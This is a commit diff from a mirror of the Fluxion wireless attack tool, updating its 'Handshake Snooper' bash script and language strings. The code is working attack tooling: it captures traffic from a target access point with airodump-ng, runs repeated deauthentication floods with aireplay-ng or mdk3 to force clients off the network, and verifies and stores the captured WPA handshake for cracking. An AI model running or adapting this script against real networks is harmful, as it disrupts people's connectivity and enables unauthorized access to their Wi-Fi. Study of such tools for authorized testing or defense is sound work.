Mirrors
/
fluxion
mirror of https://github.com/FluxionNetwork/fluxion.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Improved the Handshake Snooper attack. 

The verifier may now run asynchronously, or synchronously for slow systems.
The attack temporarily halts deauthenticators to allow client reconnection.
The attack's checking interval is now customizable.
The attack offers better user feedback via a dynamic log.
This commit is contained in:
Matias Barcenas 2017-11-29 23:19:42 -06:00
parent 5ca52e20c6
commit ddf830ab5e
2 changed files with 207 additions and 114 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

306
attacks/Handshake Snooper/attack.sh
View File

@ -5,109 +5,110 @@
HandshakeSnooperState="Not Ready" HandshakeSnooperState="Not Ready"
################################# < Handshake Snooper > ################################ ################################# < Handshake Snooper > ################################
function handshake_verifier_daemon() { function handshake_snooper_arbiter_daemon() {
if [ ${#@} -lt 5 ]; then return 1; fi if [ ${#@} -lt 1 ]; then return 1; fi
local handshakeVerifierState="running" # Start daemon in the running state to continue execution until aborted,
# or until a hash has been verified to exist in the capture file.
# NOTE: The line below must remain before trap to prevent race conditions.
local handshake_snooper_arbiter_daemon_state="running"
function handle_verifier_abort() { function handshake_snooper_arbiter_daemon_abort() {
handshakeVerifierState="aborted" handshake_snooper_arbiter_daemon_state="aborted"
if [ "$handshakeVerifierXtermPID" ]; then kill $handshakeVerifierXtermPID; fi if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then
kill $handshake_snooper_arbiter_daemon_viewerPID
fi
handshake_snooper_stop_deauthenticator
handshake_snooper_stop_captor
} }
trap handle_verifier_abort SIGABRT trap handshake_snooper_arbiter_daemon_abort SIGABRT
source lib/HashUtils.sh source lib/HashUtils.sh
source lib/ColorUtils.sh source lib/ColorUtils.sh
echo "Waiting for handshake data." > $FLUXIONWorkspacePath/result.txt echo -e "${CCyn}Handshake Snooper$CClr arbiter daemon running." > $FLUXIONWorkspacePath/handshake_snooper.log
echo "" >> $FLUXIONWorkspacePath/result.txt
# Display some feedback to the user to assure verifier is working. # Display some feedback to the user to assure verifier is working.
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" -title "Handshake Snooper Verifier" -e "while (true); do clear; cat $FLUXIONWorkspacePath/result.txt; sleep 3; done" & xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" -title "Handshake Snooper Arbiter Log" -e "tail -f $FLUXIONWorkspacePath/handshake_snooper.log" &
local handshakeVerifierXtermPID=$! local handshake_snooper_arbiter_daemon_viewerPID=$!
local handshakeCheckResult=1 # Assume invalid initially handshake_snooper_start_captor; sleep 5
while [ $handshakeCheckResult -ne 0 -a "$handshakeVerifierState" = "running" ]; do handshake_snooper_start_deauthenticator
echo "[$(date '+%H:%M:%S')] Waiting for valid hash..." >> $FLUXIONWorkspacePath/result.txt
sleep 3
pyrit -r "$4" -o "${4/.cap/-clean.cap}" stripLive local handshake_snooper_arbiter_daemon_verified=1 # Assume it hasn't been verified yet (1 => false/error).
hash_check_handshake "$3" "${4/.cap/-clean.cap}" "${@:5:2}" # Keep snooping and verifying until we've got a valid hash from the capture file.
handshakeCheckResult=$? while [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; do
echo "[$(env -i date '+%H:%M:%S')] Snooping for $HANDSHAKEVerifierInterval seconds." >> $FLUXIONWorkspacePath/handshake_snooper.log
sleep $HANDSHAKEVerifierInterval;
# Check for abort after every blocking operation.
if [ "$handshake_snooper_arbiter_daemon_state" = "aborted" ]; then break; fi
# If synchronously searching, stop the captor and deauthenticator before checking.
if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" ]; then
echo "[$(env -i date '+%H:%M:%S')] Stopping snooper & checking for hashes." >> $FLUXIONWorkspacePath/handshake_snooper.log
handshake_snooper_stop_deauthenticator
handshake_snooper_stop_captor
mv "$FLUXIONWorkspacePath/capture/dump-01.cap" "$FLUXIONWorkspacePath/capture/recent.cap"
else
pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &> $FLUXIONOutputDevice
fi
# Check for abort after every blocking operation.
if [ "$handshake_snooper_arbiter_daemon_state" = "aborted" ]; then break; fi
echo "[$(env -i date '+%H:%M:%S')] Searching for hashes in the capture file." >> $FLUXIONWorkspacePath/handshake_snooper.log
hash_check_handshake "$HANDSHAKEVerifierIdentifier" "$FLUXIONWorkspacePath/capture/recent.cap" "$APTargetSSID" "$APTargetMAC"
handshake_snooper_arbiter_daemon_verified=$?
# Check for abort after every blocking operation.
if [ "$handshake_snooper_arbiter_daemon_state" = "aborted" ]; then break; fi
# If synchronously searching, restart the captor and deauthenticator after checking.
if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a $handshake_snooper_arbiter_daemon_verified -ne 0 -a ]; then
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*"
handshake_snooper_start_captor; sleep 5
handshake_snooper_start_deauthenticator
# Check for abort after every blocking operation.
if [ "$handshake_snooper_arbiter_daemon_state" = "aborted" ]; then break; fi
fi
done done
echo "" > $FLUXIONWorkspacePath/result.txt # Stop captor and deauthenticator if we were searching asynchronously.
#sleep 5 && kill $handshakeVerifierXtermPID & if [ "$HANDSHAKEVerifierSynchronicity" = "non-blocking" ]; then
handshake_snooper_stop_deauthenticator
handshake_snooper_stop_captor
fi
# If handshake didn't pass verification, it was aborted. # If handshake didn't pass verification, it was aborted.
if [ $handshakeCheckResult -ne 0 ]; then if [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then
echo -e "${CRed}Error${CClr}: No valid handshake found." >> $FLUXIONWorkspacePath/result.txt echo -e "${CYel}Aborted${CClr}: The operation's been aborted, no valid hash was found." >> $FLUXIONWorkspacePath/handshake_snooper.log
return 1 return 1
else else
echo -e "${CGrn}Success${CClr}: A valid handshake was found!" >> $FLUXIONWorkspacePath/result.txt echo -e "${CGrn}Success${CClr}: A valid hash was detected and saved to fluxion's database." >> $FLUXIONWorkspacePath/handshake_snooper.log
fi fi
# Assure we've got a directory to store hashes into. # Assure we've got a directory to store hashes into.
local hashDirectory=$(dirname "$2") local handshake_snooper_arbiter_daemon_hashDirectory=$(dirname "$2")
if [ ! -d "$hashDirectory" ]; then if [ ! -d "$handshake_snooper_arbiter_daemon_hashDirectory" ]; then
mkdir -p "$hashDirectory" mkdir -p "$handshake_snooper_arbiter_daemon_hashDirectory"
fi fi
# Move handshake to storage if one was acquired. # Move handshake to storage if one was acquired.
mv "${4/.cap/-clean.cap}" "$2" mv "$FLUXIONWorkspacePath/capture/recent.cap" "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap"
# Cleanup files we've created to leave it in original state.
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*"
# Signal parent process the verification terminated. # Signal parent process the verification terminated.
kill -s SIGABRT $1 kill -s SIGABRT $1
} }
function handshake_stop_verifier() { function handshake_snooper_stop_captor() {
if [ "$HANDSHAKEVerifierPID" ]; then
kill -s SIGABRT $HANDSHAKEVerifierPID &> $FLUXIONOutputDevice
fi
HANDSHAKEVerifierPID=""
}
function handshake_start_verifier() {
handshake_verifier_daemon $$ \
"$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" \
"$HANDSHAKEVerifier" "$FLUXIONWorkspacePath/capture/dump-01.cap" \
"$APTargetSSID" "$APTargetMAC" &> $FLUXIONOutputDevice &
HANDSHAKEVerifierPID=$!
}
function handshake_stop_deauthenticator() {
if [ "$HANDSHAKEDeauthenticatorPID" ]; then
kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
fi
HANDSHAKEDeauthenticatorPID=""
}
function handshake_start_deauthenticator() {
if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi
handshake_stop_deauthenticator
# Prepare deauthenticators
case "$HANDSHAKEMethod" in
"$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst
esac
# Start deauthenticators.
case "$HANDSHAKEMethod" in
"$HandshakeSnooperAireplayMethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
aireplay-ng --deauth=9999999999 -a $APTargetMAC --ignore-negative-one $WIMonitor &
HANDSHAKEDeauthenticatorPID=$!;;
"$HandshakeSnooperMdk3MethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel &
HANDSHAKEDeauthenticatorPID=$!;;
esac
}
function handshake_stop_captor() {
if [ "$HANDSHAKECaptorPID" ]; then if [ "$HANDSHAKECaptorPID" ]; then
kill $HANDSHAKECaptorPID &> $FLUXIONOutputDevice kill $HANDSHAKECaptorPID &> $FLUXIONOutputDevice
fi fi
@ -115,53 +116,75 @@ function handshake_stop_captor() {
HANDSHAKECaptorPID="" HANDSHAKECaptorPID=""
} }
function handshake_start_captor() { function handshake_snooper_start_captor() {
if [ "$HANDSHAKECaptorPID" ]; then return 0; fi if [ "$HANDSHAKECaptorPID" ]; then return 0; fi
handshake_stop_captor handshake_snooper_stop_captor
xterm -hold -title "Handshake Captor (CH $APTargetChannel)" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e \ xterm -hold -title "Handshake Captor (CH $APTargetChannel)" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e \
airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor & airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor &
HANDSHAKECaptorPID=$! # Target the xterm, since we won't need to keep it around. HANDSHAKECaptorPID=$! # Target the xterm, since we won't need to keep it around.
echo -e "$FLUXIONVLine Captor process is starting, please wait..."
#while [ ! "$HANDSHAKECaptorPID" ]; do
# Here, we'll wait for the airodump-ng PID, since we want to leave the xterm open.
# This is because we need to have a method of notifying the user the hash is captured.
# Once the hash is captured, we can terminate the captor and the xterm will freeze.
# HANDSHAKECaptorPID=$(ps a | awk '$5~/^airodump-ng/ && $8~/'"$APTargetMAC"'/{print $1}')
# sleep 1
#done
} }
function handshake_unset_method() { function handshake_snooper_stop_deauthenticator() {
HANDSHAKEMethod="" if [ "$HANDSHAKEDeauthenticatorPID" ]; then
kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
fi
HANDSHAKEDeauthenticatorPID=""
} }
function handshake_set_method() { function handshake_snooper_start_deauthenticator() {
if [ "$HANDSHAKEMethod" ]; then return 0; fi if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi
handshake_unset_method handshake_snooper_stop_deauthenticator
# Prepare deauthenticators
case "$HANDSHAKEDeauthenticatorIdentifier" in
"$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst
esac
# Start deauthenticators.
case "$HANDSHAKEDeauthenticatorIdentifier" in
"$HandshakeSnooperAireplayMethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
"while true; do aireplay-ng --deauth=3 -a $APTargetMAC --ignore-negative-one $WIMonitor; sleep 5; done" &
HANDSHAKEDeauthenticatorPID=$!;;
"$HandshakeSnooperMdk3MethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
"while true; do timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; sleep 5; done" &
HANDSHAKEDeauthenticatorPID=$!;;
esac
}
function handshake_snooper_unset_deauthenticator_identifier() {
HANDSHAKEDeauthenticatorIdentifier=""
}
function handshake_snooper_set_deauthenticator_identifier() {
if [ "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 0; fi
handshake_snooper_unset_deauthenticator_identifier
local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption") local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption")
io_query_choice "$HandshakeSnooperMethodQuery" methods[@] io_query_choice "$HandshakeSnooperMethodQuery" methods[@]
HANDSHAKEMethod=$IOQueryChoice HANDSHAKEDeauthenticatorIdentifier=$IOQueryChoice
echo echo
if [ "$HANDSHAKEMethod" = "$FLUXIONGeneralBackOption" ]; then if [ "$HANDSHAKEDeauthenticatorIdentifier" = "$FLUXIONGeneralBackOption" ]; then
handshake_unset_method handshake_unset_deauthenticator
return 1 return 1
fi fi
} }
function handshake_unset_verifier() { function handshake_snooper_unset_verifier_identifier() {
HANDSHAKEVerifier="" HANDSHAKEVerifierIdentifier=""
} }
function handshake_set_verifier() { function handshake_snooper_set_verifier_identifier() {
if [ "$HANDSHAKEVerifier" ]; then return 0; fi if [ "$HANDSHAKEVerifierIdentifier" ]; then return 0; fi
handshake_snooper_unset_verifier_identifier
local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption") local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption")
io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@] io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@]
@ -169,19 +192,64 @@ function handshake_set_verifier() {
echo echo
case "$IOQueryChoice" in case "$IOQueryChoice" in
"$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifier="pyrit";; "$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifierIdentifier="pyrit";;
"$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifier="aircrack-ng";; "$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifierIdentifier="aircrack-ng";;
"$FLUXIONGeneralBackOption") "$FLUXIONGeneralBackOption")
handshake_unset_verifier handshake_unset_verifier
handshake_unset_method handshake_unset_deauthenticator
return 1;;
esac
}
function handshake_snooper_unset_verifier_interval() {
HANDSHAKEVerifierInterval=""
}
function handshake_snooper_set_verifier_interval() {
if [ "$HANDSHAKEVerifierInterval" ]; then return 0; fi
handshake_snooper_unset_verifier_interval
local choices=("$HandshakeSnooperVerifierInterval10SOption" "$HandshakeSnooperVerifierInterval30SOption" "$HandshakeSnooperVerifierInterval90SOption" "$FLUXIONGeneralBackOption")
io_query_choice "$HandshakeSnooperVerifierIntervalQuery" choices[@]
case "$IOQueryChoice" in
"$HandshakeSnooperVerifierInterval10SOption") HANDSHAKEVerifierInterval=10;;
"$HandshakeSnooperVerifierInterval30SOption") HANDSHAKEVerifierInterval=30;;
"$HandshakeSnooperVerifierInterval90SOption") HANDSHAKEVerifierInterval=90;;
"$FLUXIONGeneralBackOption")
handshake_snooper_unset_verifier_interval
return 1;;
esac
}
function handshake_snooper_unset_verifier_synchronicity() {
HANDSHAKEVerifierSynchronicity=""
}
function handshake_snooper_set_verifier_synchronicity() {
if [ "$HANDSHAKEVerifierSynchronicity" ]; then return 0; fi
handshake_snooper_unset_verifier_synchronicity
local choices=("$HandshakeSnooperVerifierSynchronicityAsynchronousOption" "$HandshakeSnooperVerifierSynchronicitySynchronousOption" "$FLUXIONGeneralBackOption")
io_query_choice "$HandshakeSnooperVerifierSynchronicityQuery" choices[@]
case "$IOQueryChoice" in
"$HandshakeSnooperVerifierSynchronicityAsynchronousOption") HANDSHAKEVerifierSynchronicity="non-blocking";;
"$HandshakeSnooperVerifierSynchronicitySynchronousOption") HANDSHAKEVerifierSynchronicity="blocking";;
"$FLUXIONGeneralBackOption")
handshake_snooper_unset_verifier_synchronicity
return 1;; return 1;;
esac esac
} }
function unprep_attack() { function unprep_attack() {
HandshakeSnooperState="Not Ready" HandshakeSnooperState="Not Ready"
handshake_unset_verifier handshake_snooper_unset_verifier_synchronicity
handshake_unset_method handshake_snooper_unset_verifier_interval
handshake_snooper_unset_verifier_identifier
handshake_snooper_unset_deauthenticator_identifier
sandbox_remove_workfile "$FLUXIONWorkspacePath/capture" sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
} }
@ -190,8 +258,16 @@ function prep_attack() {
mkdir -p "$FLUXIONWorkspacePath/capture" mkdir -p "$FLUXIONWorkspacePath/capture"
while true; do while true; do
handshake_set_method; if [ $? -ne 0 ]; then break; fi handshake_snooper_set_deauthenticator_identifier; if [ $? -ne 0 ]; then break; fi
handshake_set_verifier; if [ $? -ne 0 ]; then continue; fi handshake_snooper_set_verifier_identifier; if [ $? -ne 0 ]; then
handshake_snooper_set_deauthenticator_identifier; continue
fi
handshake_snooper_set_verifier_interval; if [ $? -ne 0 ]; then
handshake_snooper_unset_verifier_identifier; continue
fi
handshake_snooper_set_verifier_synchronicity; if [ $? -ne 0 ]; then
handshake_snooper_unset_verifier_interval; continue;
fi
HandshakeSnooperState="Ready" HandshakeSnooperState="Ready"
break break
done done
@ -204,16 +280,24 @@ function prep_attack() {
} }
function stop_attack() { function stop_attack() {
handshake_stop_deauthenticator #handshake_snooper_stop_deauthenticator
handshake_stop_verifier #handshake_stop_verifier
handshake_stop_captor #handshake_snooper_stop_captor
handshake_unset_verifier #handshake_unset_verifier_identifier
if [ "$HANDSHAKEArbiterPID" ]; then
kill -s SIGABRT $HANDSHAKEArbiterPID &> $FLUXIONOutputDevice
fi
HANDSHAKEArbiterPID=""
} }
# Parameters: path, SSID, MAC
function start_attack() { function start_attack() {
handshake_start_captor #handshake_snooper_start_captor
handshake_start_deauthenticator #handshake_start_verifier
handshake_start_verifier #handshake_snooper_start_deauthenticator
handshake_snooper_arbiter_daemon $$ &> $FLUXIONOutputDevice &
HANDSHAKEArbiterPID=$!
} }
# FLUXSCRIPT END # FLUXSCRIPT END

11
attacks/Handshake Snooper/language/en.sh
View File

@ -6,7 +6,16 @@
HandshakeSnooperMethodQuery="Select a method of handshake retrieval" HandshakeSnooperMethodQuery="Select a method of handshake retrieval"
HandshakeSnooperMonitorMethodOption="Monitor (${CYel}passive$CClr)" HandshakeSnooperMonitorMethodOption="Monitor (${CYel}passive$CClr)"
HandshakeSnooperAireplayMethodOption="aireplay-ng deauthentication (${CRed}aggressive$CClr)" HandshakeSnooperAireplayMethodOption="aireplay-ng deauthentication (${CRed}aggressive$CClr)"
HandshakeSnooperMdk3MethodOption="mdk3 deauthentication (${CRed}aggressive, not recommended$CClr)" HandshakeSnooperMdk3MethodOption="mdk3 deauthentication (${CRed}aggressive$CClr)"
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
HandshakeSnooperVerifierIntervalQuery="How often should the verifier check for a handshake?"
HandshakeSnooperVerifierInterval10SOption="Every 10 seconds (${CYel}fast systems only${CClr})."
HandshakeSnooperVerifierInterval30SOption="Every 30 seconds (${CGrn}recommended${CClr})."
HandshakeSnooperVerifierInterval90SOption="Every 90 seconds."
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
HandshakeSnooperVerifierSynchronicityQuery="How should verification occur?"
HandshakeSnooperVerifierSynchronicityAsynchronousOption="Asynchronously (${CYel}fast systems only${CClr})."
HandshakeSnooperVerifierSynchronicitySynchronousOption="Synchronously."
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# FLUXSCRIPT END # FLUXSCRIPT END